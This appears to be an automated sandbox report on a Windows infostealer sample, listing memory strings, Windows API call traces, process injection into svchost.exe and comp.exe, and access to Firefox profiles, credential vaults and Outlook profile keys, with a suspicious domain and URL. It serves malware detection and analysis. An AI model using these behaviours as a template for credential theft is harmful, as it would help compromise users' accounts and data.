                Source: comp.exe, 00000007.00000002.3155140386.0000000003E2A000.00000004.10000000.00040000.00000000.sdmp, OGbZSCDMTTWQqW.exe, 00000008.00000002.3153727346.0000000002FEA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
                Source: comp.exe, 00000007.00000002.3155140386.0000000003E2A000.00000004.10000000.00040000.00000000.sdmp, OGbZSCDMTTWQqW.exe, 00000008.00000002.3153727346.0000000002FEA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
                Source: comp.exe, 00000007.00000002.3156875239.000000000786E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: comp.exe, 00000007.00000002.3156875239.000000000786E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: comp.exe, 00000007.00000002.3156875239.000000000786E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: comp.exe, 00000007.00000002.3151190257.0000000002A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: comp.exe, 00000007.00000002.3151190257.0000000002A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: comp.exe, 00000007.00000002.3151190257.0000000002A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2//
                Source: comp.exe, 00000007.00000002.3151190257.0000000002A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2kk
                Source: comp.exe, 00000007.00000002.3151190257.0000000002A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: comp.exe, 00000007.00000002.3151190257.0000000002A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: comp.exe, 00000007.00000002.3151190257.0000000002A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: comp.exe, 00000007.00000002.3151190257.0000000002A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: comp.exe, 00000007.00000003.1874899555.0000000007846000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: comp.exe, 00000007.00000002.3155140386.0000000003FBC000.00000004.10000000.00040000.00000000.sdmp, comp.exe, 00000007.00000002.3156777600.0000000005E20000.00000004.00000800.00020000.00000000.sdmp, OGbZSCDMTTWQqW.exe, 00000008.00000002.3153727346.000000000317C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://whois.gandi.net/en/results?search=sunnyz.store
                Source: comp.exe, 00000007.00000002.3156875239.000000000786E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: comp.exe, 00000007.00000002.3155140386.0000000003FBC000.00000004.10000000.00040000.00000000.sdmp, comp.exe, 00000007.00000002.3156777600.0000000005E20000.00000004.00000800.00020000.00000000.sdmp, OGbZSCDMTTWQqW.exe, 00000008.00000002.3153727346.000000000317C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.gandi.net/en/domain
                Source: comp.exe, 00000007.00000002.3155140386.000000000414E000.00000004.10000000.00040000.00000000.sdmp, OGbZSCDMTTWQqW.exe, 00000008.00000002.3153727346.000000000330E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.muasamgiare.click/dc08/?WLtH=K4m3PKR19259jK4EK1P0lrWLqd0y31/RgB
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003D4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_003D4164
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003D3F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_003D3F66
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003C001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_003C001C
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003ECABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_003ECABC

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.3155508857.0000000004B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1680899176.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3150179402.0000000000670000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3150964448.0000000002970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3150708105.0000000002920000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1681689182.0000000003720000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3152822686.0000000004B90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1682428775.0000000005C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: This is a third-party compiled AutoIt script.0_2_00363B3A
                Source: SpCuEoekPa.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: SpCuEoekPa.exe, 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_6a627627-3
                Source: SpCuEoekPa.exe, 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_c2d92279-1
                Source: SpCuEoekPa.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_3884353f-a
                Source: SpCuEoekPa.exe String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_5660d704-9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_0042C643 NtClose,3_2_0042C643
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03872B60 NtClose,LdrInitializeThunk,3_2_03872B60
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03872DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_03872DF0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03872C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_03872C70
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_038735C0 NtCreateMutant,LdrInitializeThunk,3_2_038735C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03874340 NtSetContextThread,3_2_03874340
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03874650 NtSuspendThread,3_2_03874650
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03872B80 NtQueryInformationFile,3_2_03872B80
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03872BA0 NtEnumerateValueKey,3_2_03872BA0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03872BE0 NtQueryValueKey,3_2_03872BE0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03872BF0 NtAllocateVirtualMemory,3_2_03872BF0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03872AB0 NtWaitForSingleObject,3_2_03872AB0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03872AD0 NtReadFile,3_2_03872AD0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03872AF0 NtWriteFile,3_2_03872AF0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03872F90 NtProtectVirtualMemory,3_2_03872F90
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03872FA0 NtQuerySection,3_2_03872FA0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03872FB0 NtResumeThread,3_2_03872FB0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03872FE0 NtCreateFile,3_2_03872FE0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03872F30 NtCreateSection,3_2_03872F30
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03872F60 NtCreateProcessEx,3_2_03872F60
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03872E80 NtReadVirtualMemory,3_2_03872E80
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03872EA0 NtAdjustPrivilegesToken,3_2_03872EA0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03872EE0 NtQueueApcThread,3_2_03872EE0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03872E30 NtWriteVirtualMemory,3_2_03872E30
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03872DB0 NtEnumerateKey,3_2_03872DB0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03872DD0 NtDelayExecution,3_2_03872DD0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03872D00 NtSetInformationFile,3_2_03872D00
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03872D10 NtMapViewOfSection,3_2_03872D10
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03872D30 NtUnmapViewOfSection,3_2_03872D30
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03872CA0 NtQueryInformationToken,3_2_03872CA0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03872CC0 NtQueryVirtualMemory,3_2_03872CC0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03872CF0 NtOpenProcess,3_2_03872CF0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03872C00 NtQueryInformationProcess,3_2_03872C00
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03872C60 NtCreateKey,3_2_03872C60
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03873090 NtSetValueKey,3_2_03873090
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03873010 NtOpenDirectoryObject,3_2_03873010
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_038739B0 NtGetContextThread,3_2_038739B0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03873D10 NtOpenProcessToken,3_2_03873D10
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03873D70 NtOpenThread,3_2_03873D70
                Source: C:\Windows\SysWOW64\comp.exe Code function: 7_2_02FD4340 NtSetContextThread,LdrInitializeThunk,7_2_02FD4340
                Source: C:\Windows\SysWOW64\comp.exe Code function: 7_2_02FD4650 NtSuspendThread,LdrInitializeThunk,7_2_02FD4650
                Source: C:\Windows\SysWOW64\comp.exe Code function: 7_2_02FD2AF0 NtWriteFile,LdrInitializeThunk,7_2_02FD2AF0
                Source: C:\Windows\SysWOW64\comp.exe Code function: 7_2_02FD2AD0 NtReadFile,LdrInitializeThunk,7_2_02FD2AD0
                Source: C:\Windows\SysWOW64\comp.exe Code function: 7_2_02FD2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_02FD2BF0
                Source: C:\Windows\SysWOW64\comp.exe Code function: 7_2_02FD2BE0 NtQueryValueKey,LdrInitializeThunk,7_2_02FD2BE0
                Source: C:\Windows\SysWOW64\comp.exe Code function: 7_2_02FD2BA0 NtEnumerateValueKey,LdrInitializeThunk,7_2_02FD2BA0
                Source: C:\Windows\SysWOW64\comp.exe Code function: 7_2_02FD2B60 NtClose,LdrInitializeThunk,7_2_02FD2B60
                Source: C:\Windows\SysWOW64\comp.exe Code function: 7_2_02FD2EE0 NtQueueApcThread,LdrInitializeThunk,7_2_02FD2EE0
                Source: C:\Windows\SysWOW64\comp.exe Code function: 7_2_02FD2E80 NtReadVirtualMemory,LdrInitializeThunk,7_2_02FD2E80
                Source: C:\Windows\SysWOW64\comp.exe Code function: 7_2_02FD2FE0 NtCreateFile,LdrInitializeThunk,7_2_02FD2FE0
                Source: C:\Windows\SysWOW64\comp.exe Code function: 7_2_02FD2FB0 NtResumeThread,LdrInitializeThunk,7_2_02FD2FB0
                Source: C:\Windows\SysWOW64\comp.exe Code function: 7_2_02FD2F30 NtCreateSection,LdrInitializeThunk,7_2_02FD2F30
                Source: C:\Windows\SysWOW64\comp.exe Code function: 7_2_02FD2CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_02FD2CA0
                Source: C:\Windows\SysWOW64\comp.exe Code function: 7_2_02FD2C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_02FD2C70
                Source: C:\Windows\SysWOW64\comp.exe Code function: 7_2_02FD2C60 NtCreateKey,LdrInitializeThunk,7_2_02FD2C60
                Source: C:\Windows\SysWOW64\comp.exe Code function: 7_2_02FD2DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_02FD2DF0
                Source: C:\Windows\SysWOW64\comp.exe Code function: 7_2_02FD2DD0 NtDelayExecution,LdrInitializeThunk,7_2_02FD2DD0
                Source: C:\Windows\SysWOW64\comp.exe Code function: 7_2_02FD2D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_02FD2D30
                Source: C:\Windows\SysWOW64\comp.exe Code function: 7_2_02FD2D10 NtMapViewOfSection,LdrInitializeThunk,7_2_02FD2D10
                Source: C:\Windows\SysWOW64\comp.exe Code function: 7_2_02FD35C0 NtCreateMutant,LdrInitializeThunk,7_2_02FD35C0
                Source: C:\Windows\SysWOW64\comp.exe Code function: 7_2_02FD39B0 NtGetContextThread,LdrInitializeThunk,7_2_02FD39B0
                Source: C:\Windows\SysWOW64\comp.exe Code function: 7_2_02FD2AB0 NtWaitForSingleObject,7_2_02FD2AB0
                Source: C:\Windows\SysWOW64\comp.exe Code function: 7_2_02FD2B80 NtQueryInformationFile,7_2_02FD2B80
                Source: C:\Windows\SysWOW64\comp.exe Code function: 7_2_02FD2EA0 NtAdjustPrivilegesToken,7_2_02FD2EA0
                Source: C:\Windows\SysWOW64\comp.exe Code function: 7_2_02FD2E30 NtWriteVirtualMemory,7_2_02FD2E30
                Source: C:\Windows\SysWOW64\comp.exe Code function: 7_2_02FD2FA0 NtQuerySection,7_2_02FD2FA0
                Source: C:\Windows\SysWOW64\comp.exe Code function: 7_2_02FD2F90 NtProtectVirtualMemory,7_2_02FD2F90
                Source: C:\Windows\SysWOW64\comp.exe Code function: 7_2_02FD2F60 NtCreateProcessEx,7_2_02FD2F60
                Source: C:\Windows\SysWOW64\comp.exe Code function: 7_2_02FD2CF0 NtOpenProcess,7_2_02FD2CF0
                Source: C:\Windows\SysWOW64\comp.exe Code function: 7_2_02FD2CC0 NtQueryVirtualMemory,7_2_02FD2CC0
                Source: C:\Windows\SysWOW64\comp.exe Code function: 7_2_02FD2C00 NtQueryInformationProcess,7_2_02FD2C00
                Source: C:\Windows\SysWOW64\comp.exe Code function: 7_2_02FD2DB0 NtEnumerateKey,7_2_02FD2DB0
                Source: C:\Windows\SysWOW64\comp.exe Code function: 7_2_02FD2D00 NtSetInformationFile,7_2_02FD2D00
                Source: C:\Windows\SysWOW64\comp.exe Code function: 7_2_02FD3090 NtSetValueKey,7_2_02FD3090
                Source: C:\Windows\SysWOW64\comp.exe Code function: 7_2_02FD3010 NtOpenDirectoryObject,7_2_02FD3010
                Source: C:\Windows\SysWOW64\comp.exe Code function: 7_2_02FD3D70 NtOpenThread,7_2_02FD3D70
                Source: C:\Windows\SysWOW64\comp.exe Code function: 7_2_02FD3D10 NtOpenProcessToken,7_2_02FD3D10
                Source: C:\Windows\SysWOW64\comp.exe Code function: 7_2_00698FF0 NtCreateFile,7_2_00698FF0
                Source: C:\Windows\SysWOW64\comp.exe Code function: 7_2_00699160 NtReadFile,7_2_00699160
                Source: C:\Windows\SysWOW64\comp.exe Code function: 7_2_00699250 NtDeleteFile,7_2_00699250
                Source: C:\Windows\SysWOW64\comp.exe Code function: 7_2_006992F0 NtClose,7_2_006992F0
                Source: C:\Windows\SysWOW64\comp.exe Code function: 7_2_00699450 NtAllocateVirtualMemory,7_2_00699450
                Source: C:\Users\user\Desktop\SpCuEoekPa.exe Code function: 0_2_003CA1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_003CA1EF
                Source: C:\Users\user\Desktop\SpCuEoekPa.exe Code function: 0_2_003B85B1 GetCurrentProcess,OpenProcessToken,CreateEnvironmentBlock,CloseHandle,CreateProcessWithLogonW,DestroyEnvironmentBlock,0_2_003B85B1
                Source: C:\Users\user\Desktop\SpCuEoekPa.exe Code function: 0_2_003C51BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_003C51BD
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03887E54 appears 100 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0382B970 appears 283 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 038AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 038BF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03875130 appears 58 times
                Source: C:\Users\user\Desktop\SpCuEoekPa.exe | Code function: String function: 00388900 appears 42 times
                Source: C:\Users\user\Desktop\SpCuEoekPa.exe | Code function: String function: 00367DE1 appears 36 times
                Source: C:\Users\user\Desktop\SpCuEoekPa.exe | Code function: String function: 00380AE3 appears 70 times
                Source: C:\Windows\SysWOW64\comp.exe | Code function: String function: 02FD5130 appears 58 times
                Source: C:\Windows\SysWOW64\comp.exe | Code function: String function: 0300EA12 appears 86 times
                Source: C:\Windows\SysWOW64\comp.exe | Code function: String function: 02FE7E54 appears 109 times
                Source: C:\Windows\SysWOW64\comp.exe | Code function: String function: 02F8B970 appears 283 times
                Source: C:\Windows\SysWOW64\comp.exe | Code function: String function: 0301F290 appears 105 times
                Source: SpCuEoekPa.exe, 00000000.00000003.1297362517.000000000421D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs SpCuEoekPa.exe
                Source: SpCuEoekPa.exe, 00000000.00000003.1297640761.0000000004073000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs SpCuEoekPa.exe
                Source: SpCuEoekPa.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/3@8/8
                Source: C:\Users\user\Desktop\SpCuEoekPa.exe | Code function: 0_2_003CA06A GetLastError,FormatMessageW
                Source: C:\Users\user\Desktop\SpCuEoekPa.exe | Code function: 0_2_003B81CB AdjustTokenPrivileges,CloseHandle
                Source: C:\Users\user\Desktop\SpCuEoekPa.exe | Code function: 0_2_003B87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
                Source: C:\Users\user\Desktop\SpCuEoekPa.exe | Code function: 0_2_003CB333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
                Source: C:\Users\user\Desktop\SpCuEoekPa.exe | Code function: 0_2_003DEE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
                Source: C:\Users\user\Desktop\SpCuEoekPa.exe | Code function: 0_2_003D83BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear
                Source: C:\Users\user\Desktop\SpCuEoekPa.exe | Code function: 0_2_00364E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
                Source: C:\Users\user\Desktop\SpCuEoekPa.exe | File created: C:\Users\user\AppData\Local\Temp\aut3CC6.tmp
                Source: SpCuEoekPa.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\SpCuEoekPa.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: comp.exe, 00000007.00000002.3151190257.0000000002A72000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000007.00000002.3151190257.0000000002A94000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000007.00000003.1879715022.0000000002A9E000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000007.00000002.3151190257.0000000002AC2000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000007.00000003.1875930000.0000000002A94000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: SpCuEoekPa.exe | Virustotal: Detection: 52%
                Source: SpCuEoekPa.exe | ReversingLabs: Detection: 71%
                Source: unknown | Process created: C:\Users\user\Desktop\SpCuEoekPa.exe "C:\Users\user\Desktop\SpCuEoekPa.exe"
                Source: C:\Users\user\Desktop\SpCuEoekPa.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\SpCuEoekPa.exe"
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe | Process created: C:\Windows\SysWOW64\comp.exe "C:\Windows\SysWOW64\comp.exe"
                Source: C:\Windows\SysWOW64\comp.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\SpCuEoekPa.exe | Section loaded: wsock32.dll
                Source: C:\Users\user\Desktop\SpCuEoekPa.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\SpCuEoekPa.exe | Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\SpCuEoekPa.exe | Section loaded: mpr.dll
                Source: C:\Users\user\Desktop\SpCuEoekPa.exe | Section loaded: wininet.dll
                Source: C:\Users\user\Desktop\SpCuEoekPa.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\SpCuEoekPa.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\SpCuEoekPa.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\SpCuEoekPa.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\SpCuEoekPa.exe | Section loaded: iconcodecservice.dll
                Source: C:\Users\user\Desktop\SpCuEoekPa.exe | Section loaded: windowscodecs.dll
                Source: C:\Users\user\Desktop\SpCuEoekPa.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\SpCuEoekPa.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\SpCuEoekPa.exe | Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: ulib.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\comp.exe | Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe | Section loaded: wininet.dll
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe | Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe | Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe | Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe | Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe | Section loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\comp.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
                Source: C:\Windows\SysWOW64\comp.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
